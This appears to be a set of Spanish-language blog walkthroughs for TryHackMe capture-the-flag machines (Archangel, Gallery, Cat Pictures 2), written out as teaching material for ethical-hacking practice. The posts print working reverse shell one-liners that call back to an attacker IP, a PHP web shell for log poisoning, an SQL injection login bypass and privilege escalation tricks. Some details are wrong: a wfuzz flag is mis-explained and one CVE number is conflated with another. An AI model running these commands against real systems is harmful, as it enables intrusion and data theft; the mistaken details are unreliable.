Manual paso a paso Archangel TryHackMe de Hacking Ético

Manual paso a paso Archangel TryHackMe de Hacking Ético

A continuación se presenta un manual paso a paso para realizar la máquina Archangel TryHackMe (https://tryhackme.com/room/archangel) el Hacking Ético en el desafío CTF. El manual incluye explicaciones sobre los comandos utilizados y sus respectivas banderas.

Nota: Este manual tiene fines educativos y solo debe ser utilizado en entornos controlados y con autorización.

Antes de empezar, recomendamos realizar los siguientes pasos preparativos:

  1. Añade la IP de la máquina al archivo host
  2. Crea un directorio con el nombre de la máquina para tener organizados los archivos
  3. Crea un archivo para ir anotando todos los indicios que vayamos encontrando
Archangel Tryhackme Portada

Paso 1: Verificar la disponibilidad de la máquina

ping -c 1 <ip_máquina>

Este comando se utiliza para verificar la disponibilidad de la máquina objetivo mediante un ping.

Archangel Tryhackme Ping

Paso 2: Escanear puertos

nmap -A -sCVS --min-rate 5000 -v -n -Pn <ip_máquina> -oN archangel_nmap

El comando nmap se utiliza para realizar un escaneo de puertos en la máquina objetivo. Los flags utilizados tienen los siguientes significados:

  • -A: Realiza un escaneo completo, que incluye detección de servicios y sistemas operativos.
  • -sCVS: Realiza un escaneo de versiones y scripts.
  • --min-rate 5000: Establece la tasa mínima de paquetes enviados por segundo a 5000.
  • -v: Muestra una salida detallada.
  • -n: No realiza resolución DNS.
  • -Pn: Ignora el descubrimiento de hosts y trata todas las direcciones IP como accesibles.
  • -oN archangel_nmap: Guarda la salida en el archivo “archangel_nmap”.

Este escaneo revelará los puertos abiertos en la máquina, en este caso, los puertos 80 y 22.

Archangel Tryhackme Nmap

Paso 3: Explorar directorios con wfuzz

wfuzz -c --hc=404 -w /ruta_diccionario -u http://ip/FUZZ

El comando wfuzz se utiliza para buscar directorios y archivos ocultos en un servidor web. Los flags utilizados son:

  • -c: Ignora las respuestas con código de estado 404 (no encontrado).
  • --hc=404: Configura el código de estado que se debe ignorar.
  • -w /ruta_diccionario: Especifica la ruta del diccionario a utilizar.
  • -u http://ip/FUZZ: Establece la URL objetivo, donde “FUZZ” se reemplazará por las palabras del diccionario.

Este comando buscará directorios ocultos en el servidor web utilizando un diccionario de palabras.

Archangel Tryhackme Wfuzz1

Paso 4: Investigar directorio “flag” y redirecciones

burpsuite

Aquí no encontramos ninguna redirección rara, por lo que seguimos al siguiente paso, entrar en la web y encontrar el otro hostname que nos comentan. Cambia el archivo host para añadir el nuevo hostname encontrado.

Archangel Tryhackme Hostname
Archangel Tryhackme Hostname1

Paso 5: Realizar escaneo de directorios con gobuster en Archangel TryHackMe

gobuster dir -w /diccionario -x php,html,txt -t 100 -q -u <ip_máquina>

El comando gobuster se utiliza para realizar un escaneo de directorios y archivos en un servidor web. Los flags utilizados son:

  • dir: Realiza un escaneo de directorios.
  • -w /diccionario: Especifica la ruta del diccionario a utilizar.
  • -x php,html,txt: Establece las extensiones de archivo a buscar.
  • -t 100: Establece el número de hilos simultáneos.
  • -q: Muestra solo los resultados encontrados.
  • -u <ip_máquina>: Establece la URL objetivo.

Este escaneo revelará posibles directorios y archivos en la máquina objetivo, en esta ocasión vemos el archivo robots.txt, procedemos a acceder a él y vemos una página accesible, que vamos a ir a ella.

Archangel Tryhckme Gobuster

Paso 6: Investigar contenido de la nueva página

Explora el contenido del nuevo host encontrado en los pasos anteriores y busca pistas adicionales o banderas. También accede al archivo robots.txt y a la web encontrada en este archivo.

Archangel Tryhackme Flag1

Paso 7: Local File Inclusion (LFI) Archangel TryHackMe

Accede al archivo /test.php para explorar una posible vulnerabilidad de Local File Inclusion (LFI). Esto podría proporcionar una vía de intrusión al sistema.

Vamos a probar a ver a que tenemos acceso en este servidor, para ello vamos a poner después de la carpeta de development /.././.././.././../etc/passwd para ver si tenemos acceso, el poner /.././ es para engañar al servidor y que no separa que estamos realizando un LFI, en otros casos, con /../../ y así sucesivamente podemos tener acceso a los archivos.

Archangel Tryhackme Lfi1

Tras esto vemos que tenemos acceso a ese archivo, y vemos los usuarios que pueden logarse en el servidor, como primera opción, y por probar, vamos a realizar un ataque con hydra: hydra -l archangel -P /dirección/diccionario <ip_máquina> ssh con esto no conseguimos nada, por lo que vamos a ver a que archivos tenemos acceso.

Archangel Tryhackme Hydra

Vamos a ver los logs del apache, y ver si podemos hacer un ataque log poisoning para ello siguiendo la técnica anterior en vez de /etc/passwd accedemos a: /var/log/apache2/access.log, al tener acceso, vamos a proceder a realizar un ataque de log poisoning, si quieres aprender mas sobre esto, te dejo este enlace: https://ironhackers.es/tutoriales/lfi-to-rce-envenenando-ssh-y-apache-logs/

Archangel Tryhackme Logpoisoning1

Paso 9: Log Poisoning Archangel TryHackMe

Para realizar el ataque abre burpsuite y captura el tráfico una vez capturado, mándalo directamente al repeater y realiza modificaciones en el campo “User-Agent” del encabezado de la petición. Cambia la parte entre paréntesis (X11; Linux...) por el siguiente código: <?php system($_GET['cmd']); ?>. Además, agrega &cmd=id después de .log en la URL. Luego, envía la petición y verifica sí recibes una respuesta con el ID del usuario “www-data”.

Archangel Tryhackme Burpsuite1
Archangel Tryhackme Burpsuite 2

Paso 10: Acceso remoto a la máquina objetivo

Reemplaza el &cmd=id del paso anterior por un reverse shell generado en https://www.revshells.com/. Utiliza el siguiente comando:

&cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <ip_maquina_atacante> puerto >/tmp/f

Ahora selecciona desde el = hasta la f y debes de codificar la URL, para ello dale botón derecho Convert Selection -> URL -> encode-all-characters.

Archangel Tryhackme Burpsuite 3

Ponte en escucha en tu máquina atacante el puerto especificado para obtener acceso remoto a la máquina objetivo utilizando Netcat (nc -nvlp puerto).

Dale a send y espera a tener el control de la máquina víctima.

Archangel Tryhackme Nc1

Paso 11: Búsqueda de banderas y escalada de privilegios en Archangel TryHackMe

Una vez dentro de la máquina, busca las banderas y explora las opciones disponibles para la escalada de privilegios. Considera los binarios, capacidades, permisos de sudo y crontab para encontrar posibles vulnerabilidades y obtener privilegios adicionales.

Identifica un cron que se ejecuta cada minuto con el usuario “archangel”.

Archangel Tryhackme Cron1

Intenta realizar una escalada de privilegios aprovechando este cron. Edita el archivo utilizando el editor de texto Nano y reemplaza la línea “hello world” por el siguiente comando:

sh -i >& /dev/tcp/10.9.81.252/1234 0>&1
Archangel Tryhackme Cron2

Abre otro terminal y ejecuta nc -nvlp 1234. Espera hasta que obtengas acceso a la máquina como el usuario “archangel”. A partir de aquí, explora las opciones disponibles para la escalada de privilegios con este usuario.

Archangel Tryhackme Nc2

Paso 12: Acceso a la carpeta “secret” y ejecución de comandos

Accede a la carpeta “secret” y examina los archivos presentes en ella. Si encuentras un archivo comprimido, investiga su contenido utilizando el comando string. Observa que se ejecuta comandos y busca la presencia del comando “cp”.

Archangel Tryhackme Strings
Archangel Tryhackme Cp

Paso 13: Escalada de privilegios y obtención de acceso root en Archangel TryHackMe

Crea un archivo llamado “cp” y establece los siguientes permisos en él: chmod u+s /bin/bash. Luego, otorga permisos de lectura, escritura y ejecución a todos los usuarios utilizando el comando chmod 777 cp.

Archangel Tryhackme Cp1

A continuación, agrega el comando “cp” al PATH mediante el comando export PATH=.:$PATH. Después, ejecuta el archivo de backup utilizando ./backup y, finalmente, ejecuta el comando bash -p para obtener acceso como usuario root.

¡La máquina ha sido completamente comprometida! Ahora, busca la última bandera para completar el desafío.

Recuerda que este manual está diseñado para un desafío CTF y solo debe ser utilizado con fines educativos en entornos controlados y con autorización.

Resumen Archangel TryHackMe

La máquina Archangel TryHackMe presenta los siguientes aspectos clave:

  • Escaneo de puertos: Se utiliza la herramienta Nmap para identificar los puertos abiertos en la máquina. Se descubren los puertos 80 y 22 abiertos, lo que indica la presencia de servicios web y SSH.
  • Búsqueda de directorios ocultos: Se emplea la herramienta wfuzz para encontrar directorios y archivos ocultos en el sitio web. Mediante el análisis de las respuestas obtenidas, se descubre un directorio llamado “flag”.
  • Análisis de redirecciones: A través de Burp Suite, se analiza la redirección encontrada en el directorio “flag”. Sin embargo, la redirección lleva a un video de YouTube y no proporciona información adicional relevante.
  • Exploración de directorios con gobuster: Se utiliza la herramienta gobuster para buscar directorios ocultos en el dominio encontrado en el host. Se espera a que gobuster finalice su exploración mientras se busca la primera bandera en la nueva página.
  • Explotación de una vulnerabilidad LFI: Se descubre un archivo accesible llamado “test.php”, el cual resulta ser una vulnerabilidad de inclusión de archivos locales (LFI). Se aprovecha esta vulnerabilidad para realizar un ataque de log poisoning y obtener información privilegiada, como el ID del usuario “www-data”.
  • Reverse Shell: Mediante la técnica de log poisoning, se logra establecer un reverse shell en la máquina objetivo. Esto proporciona acceso remoto a la máquina a través de una conexión inversa desde la máquina del atacante.
  • Escalada de privilegios: Se exploran diferentes opciones para la escalada de privilegios. Se encuentra un cron ejecutándose con el usuario “archangel” y se realiza una segunda escalada de privilegios modificando el archivo correspondiente. Esto permite obtener acceso al usuario “archangel” y se buscan otras opciones de escalada de privilegios.
  • Búsqueda de banderas: Durante el proceso de hacking, se busca y recopila información sobre las banderas ocultas en la máquina. Se debe encontrar la última bandera después de comprometer la máquina y obtener privilegios de root.

Estas son las principales técnicas y pasos utilizados durante el CTF para lograr comprometer la máquina objetivo y obtener acceso a la información privilegiada.

Confía en DCSeguridad:

Si estás interesado en fortalecer aún más tus conocimientos y mantenerte al día con las últimas tendencias en seguridad informática, te recomendamos ponerte en contacto con DCSeguridad. Como empresa especializada en seguridad, DCSeguridad puede ofrecerte servicios de consultoría, auditoría y entrenamiento en seguridad informática.

Además, te animamos a unirte a nuestro canal de Telegram. En este canal, compartimos información relevante sobre nuevas vulnerabilidades, técnicas de ataque y mejores prácticas de seguridad. Es un lugar ideal para mantenerse actualizado y participar en discusiones con otros profesionales de seguridad. ¡Únete a nosotros y forma parte de nuestra comunidad dedicada a la seguridad informática!

Recuerda que la seguridad informática es un campo en constante evolución, por lo que es importante seguir aprendiendo y mejorando tus habilidades continuamente. ¡Buena suerte en tu viaje hacia convertirte en un experto en seguridad informática!

Galley TryHackMe manual resolución paso a paso. Pentesting

Galley TryHackMe manual resolución paso a paso. Pentesting

Descubre cómo realizar pentesting en la máquina Galley TryHackMe (https://tryhackme.com/room/gallery666) con nuestro completo manual. Aprende los pasos de preparación, técnicas de hackeo y escalada de privilegios. Obtén un enfoque práctico para proteger y fortalecer tus habilidades en seguridad informática. ¡Sigue nuestra guía paso a paso y conviértete en un experto en ciberseguridad!

Galley TryHackMe

Paso 1: Preparación del entorno para resolver Galley TryHackMe

Antes de comenzar con el pentesting, es importante realizar los siguientes pasos de preparación:

  1. Actualización del sistema operativo: Asegúrate de tener la versión más reciente del sistema operativo que utilizarás durante el proceso de pentesting. Esto te garantizará tener las últimas actualizaciones de seguridad y correcciones de errores.
  2. Organización de archivos: Crea una carpeta dedicada para la máquina que estás analizando. Esto te permitirá mantener tus archivos y resultados organizados de manera efectiva a lo largo del proceso.
  3. Configuración del archivo de hosts: Agrega la dirección IP de la máquina que estás analizando al archivo de hosts de tu sistema. Esto facilitará el acceso a la máquina durante el proceso de pentesting.
  4. Registro de indicios: Crea un archivo o registro donde puedas documentar todos los posibles indicios y hallazgos que descubras durante el análisis. Esto te ayudará a llevar un seguimiento ordenado y completo de tu progreso y resultados.

Realizar estos pasos de preparación garantizará que tengas un entorno adecuado y organizado para llevar a cabo el pentesting de manera eficiente.

Paso 2: Comienza el Hackeo en Galley TryHackMe

Una vez que hayas preparado el entorno, procede con los siguientes pasos para iniciar el hackeo:

Comprobación de disponibilidad: Para verificar si la máquina objetivo está en línea, utiliza el comando ping -c 1 [ip_maquina]. Esto enviará un solo paquete de ping a la dirección IP de la máquina y te indicará si está accesible.

Gallery Tryhackme Ping

Enumeración de puertos abiertos: Utiliza el siguiente comando para identificar los puertos abiertos en la máquina objetivo y responder la primera pregunta planteada:

   nmap -A -sCVS --min-rate 5000 -n -v -Pn [ip_maquina] -oN gallery_nmap

Este comando utiliza Nmap para realizar un escaneo exhaustivo de la máquina y muestra información detallada sobre los servicios y versiones en los puertos abiertos. El resultado revelará que los puertos 80 y 8080 están abiertos.

Gallery Tryhackme Nmap

Escaneo web con WhatWeb: A continuación, utiliza el comando whatweb [ip_maquina]:80 y whatweb [ip_maquina]:8080 para realizar un escaneo web en los puertos abiertos. Esto proporcionará información sobre las tecnologías y aplicaciones utilizadas en los servicios web.

Exploración de la aplicación con Dirb: Para buscar posibles directorios y archivos ocultos en la aplicación web que se encuentra en el puerto 8080, ejecuta el siguiente comando:

   dirb http://gallery.thm:8080

Dirb realizará un análisis exhaustivo de la aplicación en busca de rutas y archivos que puedan ser relevantes para el hackeo.

Paso 3: Búsqueda de Exploits

Después de realizar los pasos anteriores sin encontrar resultados, es hora de buscar posibles exploits que puedan ser aprovechados en la versión de “Simple Image Gallery”. Sigue los siguientes pasos:

Utiliza la herramienta searchsploit para buscar exploits relacionados con la versión de “Simple Image Gallery”:

   searchsploit simple image gallery
Gallery Tryhackme Searchexploit

Este comando buscará en la base de datos de exploits de la herramienta “searchsploit” y mostrará posibles exploits disponibles para la versión específica de “Simple Image Gallery”.

Encuentra y selecciona dos posibles exploits que parezcan relevantes para tu objetivo.

Prueba el primer exploit seleccionado que permita una inyección SQL en el campo de inicio de sesión. Por ejemplo, si el exploit muestra una inyección SQL exitosa utilizando el usuario “admin” con la siguiente cadena: admin' or '1'='1'#, realiza la inyección en el campo de inicio de sesión para loguearte como administrador:

   username: admin' or '1'='1'#
   password: [deja en blanco]
Gallery Tryhackme Exploit1

Si la inyección SQL tiene éxito, obtendrás acceso al sitio como administrador.

Una vez dentro del sitio, explora las funcionalidades y opciones disponibles. Observa la sección de álbumes y verifica que existe la posibilidad de subir una “shell reversa”.

Configura un listener en tu máquina atacante utilizando netcat para escuchar conexiones entrantes en un puerto específico:

   nc -nlvp [puerto]
Gallery Tryhackme Nc 1

Haz clic en la opción de subir archivo para subir una “shell reversa” en el sitio web. Esto iniciará una conexión a tu máquina atacante y proporcionará acceso al servidor objetivo.

Gallery Tryhackme 2

Paso 4: Segundo Exploit y Obtención del Hash de Contraseña

Salimos del Shell reverso y vamos a explorar otras opciones, con el otro exploit, para volver al shell reverso tenemos tiempo, y además aprenderemos nuevas formas de ataques y obtención de objetivos.

Abre Burp Suite y captura una solicitud HTTP cuando cargas una imagen en la aplicación. Guarda la solicitud capturada en un archivo llamado “test.req”.

Utiliza la herramienta sqlmap para analizar la solicitud capturada y obtener información sobre las bases de datos presentes en la aplicación:

   sqlmap -r test.req --dbs
Gallery Tryhackme Sqlmap

Este comando enviará la solicitud capturada a la herramienta sqlmap, que analizará la estructura de la base de datos en busca de posibles vulnerabilidades.

Una vez obtenidos los nombres de las bases de datos, como “gallery_db” e “information_schema”, ejecuta el siguiente comando para enumerar las tablas en la base de datos seleccionada:

   sqlmap -r test.req -D database_name --tables
Gallery Tryhackme Sqlmap 2

Reemplaza “database_name” por el nombre de la base de datos que deseas explorar.

Ahora, para obtener información sobre los usuarios y sus hashes de contraseña, ejecuta el siguiente comando:

   sqlmap -r test.req -D database_name -T table_name --dump
Gallery Tryhackme Sqlmap 4

Reemplaza “database_name” por el nombre de la base de datos y “table_name” por el nombre de la tabla que contiene los datos de los usuarios. Este comando extraerá la información de los usuarios, incluyendo los hashes de contraseña, si están disponibles.

Paso 5: Volver a la Shell Reversa en Galley TryHackMe

En este paso, retomaremos el uso de la shell reversa para obtener acceso al servidor objetivo. Sigue los siguientes pasos:

Configura una shell reversa en la máquina atacante para establecer la conexión con el servidor. Para mejorar la shell reversa, utiliza el siguiente comando:

   script /dev/null -c bash

Esta línea de comando mejorará la interactividad y estabilidad de la shell reversa.

Exporta la variable de entorno “TERM” a “xterm” para asegurar una correcta visualización del terminal:

   export TERM=xterm

Monta un servidor HTTP en tu máquina atacante utilizando Python para transferir el archivo “linpeas.sh” al servidor objetivo. Ejecuta el siguiente comando:

   python3 -m http.server
Gallery Tryhackme Httpserver

Esto iniciará un servidor HTTP en tu máquina atacante.

En la máquina víctima, accede a un directorio en el que tengas los permisos necesarios y descarga el archivo “linpeas.sh” desde tu servidor atacante. Por ejemplo, si has elegido el directorio “/tmp”, utiliza el siguiente comando:

   wget [tu_ip]:8000/linpeas.sh -O /tmp/linpeas.sh

Asegúrate de reemplazar “[tu_ip]” con la dirección IP de tu máquina atacante.

Otorga permisos de ejecución al archivo “linpeas.sh”:

   chmod +x /tmp/linpeas.sh

Ejecuta el script “linpeas.sh” para buscar vulnerabilidades en el sistema:

   bash /tmp/linpeas.sh
Gallery Tryhackme Linpeas

Espera a que el script finalice su ejecución y analiza los resultados en busca de posibles vulnerabilidades.

Durante el análisis, es posible que descubras una contraseña de usuario. Prueba esta contraseña con el usuario “mike” utilizando el siguiente comando:

Gallery Tryhackme Password
   su mike

Si la contraseña es correcta, ahora tendrás acceso como el usuario “mike”.

Verifica los permisos disponibles para tu usuario utilizando el comando:

   sudo -l

Observa si tienes permisos para ejecutar archivos con la ruta “/bin/bash” utilizando el comando “sudo”.

Gallery Tryhackme Sudo L

Paso 6: Escalada de Privilegios Final para Galley TryHackMe

En este paso, realizaremos la escalada final de privilegios utilizando una vulnerabilidad específica en el comando nano. Sigue los siguientes pasos:

Al hacer cat en el archivo en cuestión, descubrimos que podemos escalar privilegios utilizando nano con la opción read. Para obtener más información sobre cómo aprovechar esta vulnerabilidad, sigue las instrucciones detalladas en el siguiente enlace: https://gtfobins.github.io/gtfobins/nano/#sudo

Gallery Tryhackme Nano

Vamos a obtener una shell mejorada utilizando los siguientes pasos:

  • Escribe script /dev/null -c bash en la línea de comandos y presiona Ctrl+Z para suspender el proceso.
  • Una vez en tu terminal, escribe - stty raw -echo ; fg y presiona Enter. Esto reanudará la ejecución del proceso suspendido.
  • Ahora estarás de vuelta en la shell. Escribe reset y presiona Enter.
Gallery Tryhackme Mejora Terminal

Ejecuta el comando sudo -l para verificar los privilegios disponibles. Observa la opción encontrada para ejecutar sudo /bin/bash /opt/rootkit.sh. Sin embargo, es posible que recibas un error de terminal.

Para solucionar el error de terminal, escribe export TERM=xterm y presiona Enter.

Gallery Tryhackme Terminal

Ahora, ejecuta nuevamente el comando sudo /bin/bash /opt/rootkit.sh y en las opciones de nano, elige read.

Gallery Tryhackme Privilegios

Ahora, realiza los siguientes pasos en nano:

   ^R^X (Ctrl+R, Ctrl+X)

Esto te proporcionará una línea de comandos en la parte inferior de nano. Escribe:

   reset; sh 1>&0 2>&0
Gallery Tryhackme Root1

Esto establecerá una nueva sesión de shell.

¡Ahora serás el usuario root! Puedes obtener la última bandera y realizar cualquier acción como root.

Gallery Tryhackme Root

Siguiendo estos pasos, lograrás la escalada final de privilegios y obtendrás acceso como usuario root. Asegúrate de seguir las mejores prácticas de seguridad y actuar de manera ética en todo momento.

Resumen del proceso y tipo de máquina trabajada:

En este manual, se ha seguido un proceso paso a paso para realizar el pentesting de la máquina Gallery en Try Hack Me. Se han cubierto los siguientes aspectos clave:

  1. Preparación del entorno: Actualización del sistema operativo, organización de archivos, configuración del archivo de hosts y registro de indicios.
  2. Comienzo del hackeo: Comprobación de disponibilidad, enumeración de puertos abiertos, escaneo web con WhatWeb y exploración de la aplicación con Dirb.
  3. Búsqueda de exploits: Utilización de la herramienta “searchsploit” para buscar exploits relacionados con la versión de “Simple Image Gallery” y prueba de exploits seleccionados.
  4. Obtención del hash de contraseña: Captura de una solicitud HTTP con Burp Suite, análisis de la solicitud con “sqlmap” para obtener información sobre las bases de datos, tablas y usuarios, y extracción de los hashes de contraseña.
  5. Volver a la shell reversa: Configuración de la shell reversa, transferencia de archivos y búsqueda de vulnerabilidades en el sistema.
  6. Escalada de privilegios final: Utilización de una vulnerabilidad en el comando “nano” para realizar la escalada de privilegios hasta el usuario “root”.

Según la experiencia proporcionada, la máquina Gallery de Try Hack Me es una máquina de nivel intermedio, aunque en la plataforma es fácil. Proporciona la oportunidad de practicar varias técnicas de pentesting, incluyendo enumeración de puertos, análisis de aplicaciones web, búsqueda de exploits, obtención de información de bases de datos y escalada de privilegios. Este tipo de máquinas son ideales para aquellos que desean mejorar sus habilidades en seguridad informática y familiarizarse con los procesos y herramientas utilizados en el pentesting.

Confía en DCSeguridad:

Si estás interesado en fortalecer aún más tus conocimientos y mantenerte al día con las últimas tendencias en seguridad informática, te recomendamos ponerte en contacto con DCSeguridad. Como empresa especializada en seguridad, DCSeguridad puede ofrecerte servicios de consultoría, auditoría y entrenamiento en seguridad informática.

Además, te animamos a unirte a nuestro canal de Telegram. En este canal, compartimos información relevante sobre nuevas vulnerabilidades, técnicas de ataque y mejores prácticas de seguridad. Es un lugar ideal para mantenerse actualizado y participar en discusiones con otros profesionales de seguridad. ¡Únete a nosotros y forma parte de nuestra comunidad dedicada a la seguridad informática!

Recuerda que la seguridad informática es un campo en constante evolución, por lo que es importante seguir aprendiendo y mejorando tus habilidades continuamente. ¡Buena suerte en tu viaje hacia convertirte en un experto en seguridad informática!

Manual paso a paso Cat Pictures 2 TryHackMe

Manual paso a paso Cat Pictures 2 TryHackMe

Este manual proporcionará una guía detallada para llevar a cabo una prueba de penetración en la máquina Cat Pictures 2 TryHackMe https://tryhackme.com/room/catpictures2. Está diseñado específicamente para aquellos que se están iniciando en el campo del pentesting, por lo que se explicarán los puntos más importantes en un lenguaje claro y profesional.

Antes de comenzar, es crucial recordar que debes obtener los permisos adecuados y autorización antes de realizar cualquier actividad de pentesting en sistemas o redes que no te pertenezcan. El cumplimiento de la ética y las regulaciones es fundamental en este campo.

Paso 1: Preparación inicial para Cat Pictures 2 TryHackMe

Antes de iniciar la prueba de penetración, es necesario realizar algunas tareas de preparación:

  1. Crea un directorio de trabajo específico para este proyecto y cámbiate al directorio correspondiente. Esto ayudará a organizar tus archivos y facilitará la gestión de la prueba de penetración.
  2. Agrega la dirección IP de la máquina Cat Pictures 2 a tu archivo de hosts. Esto simplificará el acceso a la máquina durante la prueba.

Paso 2: Actualización del sistema

Es recomendable comenzar por actualizar el sistema objetivo con las últimas actualizaciones disponibles. Esto garantizará que se aprovechen las correcciones de seguridad más recientes, lo que puede dificultar la explotación de vulnerabilidades conocidas.

Paso 3: Identificación de la máquina objetivo

Antes de iniciar cualquier exploración, es útil determinar si la máquina objetivo está en línea y obtener información básica sobre ella. Para hacerlo, realiza un ping a la máquina utilizando el siguiente comando:

ping -c 1 <dirección IP>

Este comando enviará un solo paquete de ping y mostrará la respuesta. Al verificar la conectividad y el valor TTL (Time to Live), podrás identificar el sistema operativo en uso.

Cat Pictures 2 Try Hack Me Ping

Paso 4: Escaneo de puertos de Cat Pictures 2 TryHackMe

El siguiente paso consiste en realizar un escaneo de puertos para identificar los servicios que se ejecutan en la máquina. Utilizaremos la herramienta nmap con una serie de opciones para obtener información detallada:

nmap -A -sCSV --min-rate 5000 -v -n -Pn <dirección IP> -oN nmap_inicial.txt
Cat Pictures 2 Try Hack Me Nmap

Este comando realizará un escaneo exhaustivo de puertos, incluyendo la detección de servicios, versiones, scripts y generará un archivo de salida en formato CSV llamado nmap_inicial.txt.

Analiza el archivo nmap_inicial.txt para identificar los puertos abiertos. Presta especial atención a los puertos 22, 80, 222, 3000 y 8080, ya que se encontraron servicios SSH y servicios web en estos puertos.

Paso 5: Enumeración de directorios web en Cat Pictures 2 TryHackMe

A continuación, procederemos a enumerar los directorios en los servicios web encontrados en los puertos 80, 3000 y 8080 utilizando la herramienta dirb. Ejecuta los siguientes comandos para cada puerto:

dirb http://<dirección IP>:<puerto>

Analiza cuidadosamente los resultados de la enumeración de directorios en busca de posibles puntos de entrada adicionales.

Paso 6: Análisis de imágenes y metadatos

Después de revisar los directorios y no encontrar resultados significativos, nos centraremos en la exploración de los servicios web. Comenzaremos analizando la página de gatos en el puerto 80.

Cat Pictures 2 Try Hack Me Metadatos

Después de investigar durante un tiempo, descubrimos que una de las imágenes en la pestaña “información” contiene pistas sobre los siguientes pasos. Descarga esta imagen utilizando el comando wget:

wget http://<dirección IP>:<puerto>/ruta/a/la/imagen.jpg
Cat Pictures 2 Try Hack Me Wget1

Una vez que hayas descargado la imagen, realiza un análisis de metadatos utilizando la herramienta exiftool:

exiftool imagen.jpg
Cat Pictures 2 Try Hack Me Exiftool

Examina los metadatos de la imagen y busca cualquier información relevante, como títulos ocultos o datos incrustados. Accede a lo que encuentras y Voalà, ya tienes unas credenciales de acceso.

Cat Pictures 2 Tryhackme Credenciales

Paso 7: Acceso a Gitea y descubrimiento de credenciales

Utilizando las credenciales descubiertas en los pasos anteriores, procedemos a acceder al servicio Gitea en el puerto 3000. Al explorar todo en Gitea, encontramos un repositorio local donde descubrimos la primera bandera.

Cat Pictures 2 Tryhacckme Repositories

Además, en el punto anterior, hay un puerto mencionado para acceder a otro apartado del servidor. Para aprovechar esta oportunidad, realizaremos una modificación en uno de los archivos encontrados en el repositorio para obtener un reverse shell.

Cat Pictures 2 Tryhackme 1337

Primero haz pruebas con los botones, veras que en los logs, hay uno que realiza una tarea con uno de los archivos encontrados en el repositorio, y podemos hacer una shell reversa para conseguir un primer acceso al servidor, visita el sitio web revshells.com y genera un codigo bash para el ataque, luego sustituye el command whoami por: bash -c “sh -i >& /dev/tcp/ip_maquina_atacante/puerto/ 0>&1” y guarda el archivo.

Cat Pictures 2 Tryhackme Playbook

Mientras tanto, abre una escucha de Netcat en tu máquina atacante para recibir la conexión entrante del reverse shell. Utiliza el comando nc -lvnp <puerto> en tu máquina atacante, reemplazando <puerto> por el puerto que especificaste en el comando de reverse shell. Una vez abierto, ejecuta la tarea en la pagina de OliveTin.

Cat Pictures 2 Tryhackme Nc
Cat Pictures 2 Tryhackme Olivetin

Una vez que la tarea se haya ejecutado en el servidor, se establecerá una conexión de reverse shell desde el servidor objetivo a tu máquina atacante.

Ahora, tendrás acceso a una shell en el servidor objetivo a través de la conexión de reverse shell. Puedes interactuar con la shell y ejecutar comandos en el servidor.

Para mejorar la shell y tener una experiencia más cómoda, ejecuta el siguiente comando en la shell para iniciar una nueva instancia de bash:

script /dev/null -c bash
Cat Pictures 2 Tryhackme Reverse

Con este proceso, podrás obtener acceso al servidor a través de un reverse shell y mejorar la shell para una mejor interacción.

Paso 8: Escalada de privilegios en Cat Pictures 2 TryHackMe

Una vez dentro de los repositorios en Gitea, busca la primera bandera y continúa explorando. Si es necesario, intenta escalar privilegios utilizando técnicas como sudo, suid o capabilities. Examina cuidadosamente las configuraciones de privilegios y busca posibles vulnerabilidades.

Paso 9: Búsqueda de vulnerabilidades con Linpeas

Si no se encuentra ninguna vulnerabilidad inmediata, procederemos a utilizar la herramienta Linpeas para explorar posibles vulnerabilidades ocultas en el sistema. Descarga el script linpeas.sh en tu máquina atacante ejecutando los siguientes comandos:

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh

Después, configura un servidor HTTP en tu máquina atacante para compartir el archivo descargado:

python3 -m http.server

En la máquina objetivo, descarga el archivo linpeas.sh utilizando el siguiente comando:

wget http://<dirección IP>:8000/linpeas.sh
Cat Pictures 2 Tryhackme Linpeas

Concede permisos de ejecución al archivo:

chmod +x linpeas.sh

Finalmente, ejecuta el script:

bash ./linpeas.sh

Analiza cuidadosamente los resultados obtenidos por Linpeas en busca de vulnerabilidades o configuraciones incorrectas.

Aquí te dejo un manual de linpeas: https://www.youtube.com/watch?v=OPWYKR7M_Uo

Paso 10: Explotación de la vulnerabilidad CVE-2021-4034 en Cat Pictures 2 TryHackMe

Si Linpeas no revela ninguna vulnerabilidad explotable, es posible que necesitemos buscar vulnerabilidades específicas. En este caso, se menciona una vulnerabilidad conocida, CVE-2021-4034, relacionada con la versión de sudo.

Cat Pictures 2 Tryhackme Linpeas 2

Clona el repositorio https://github.com/blasty/CVE-2021-3156 en tu máquina atacante y comprimelo en .tar, a continuación monta un servidor http con python3 -m http.server y desde la maquina victima descarga el archivo, así como descomprimir el .tar, sigue las instrucciones proporcionadas en el repositorio para aprovechar esta vulnerabilidad y elevar los privilegios a root.

Cat Pictures 2 Tryhackme Root 1
Cat Pictures 2 Tryhackme Root 2

¡Importante! Asegúrate de seguir las mejores prácticas de seguridad y obtener permiso antes de utilizar exploits en sistemas que no te pertenecen.

Conclusión Cat Pictures 2 TryHackMe

Una vez que hayas logrado elevar tus privilegios a root, habrás completado exitosamente el pentesting en la máquina Cat Pictures 2 de Try Hack Me. Recuerda documentar todas las etapas y resultados de tu proceso para futuras referencias.

Resumen Cat Pictures 2 TryHackMe

En este manual, hemos proporcionado una guía paso a paso para realizar una prueba de penetración en la máquina Cat Pictures 2 de Try Hack Me. Comenzamos con la preparación inicial, seguida de la actualización del sistema y la identificación de la máquina objetivo. Luego, realizamos un escaneo de puertos y enumeramos los directorios web en los servicios encontrados. Continuamos con el análisis de imágenes y metadatos, el acceso a Gitea y el descubrimiento de credenciales. Después, nos enfocamos en el escalamiento de privilegios y la búsqueda de vulnerabilidades ocultas utilizando Linpeas. Finalmente, exploramos una vulnerabilidad conocida (CVE-2021-4034) y concluimos el proceso.

Esta máquina Cat Pictures 2 de Try Hack Me ofrece un nivel de dificultad medio, lo que la convierte en un buen desafío para aquellos que se están iniciando en el pentesting. Te recomendamos seguir practicando y mejorando tus habilidades en este emocionante campo.

Si estás interesado en obtener más información sobre seguridad y pentesting, te invitamos a ponerte en contacto con nosotros en DCSeguridad. Nuestra empresa cuenta con expertos en seguridad que pueden ayudarte en tus proyectos y desafíos. También puedes unirte a nuestro canal de Telegram para mantenerte actualizado sobre las últimas noticias y recursos en el mundo de la seguridad.

¡Te deseamos buena suerte en tus futuras aventuras de pentesting!

Manual paso a paso Cat Pictures 2 TryHackMe

Resolución Pickle Rick Try Hack Me Paso a Paso Hacking Ético

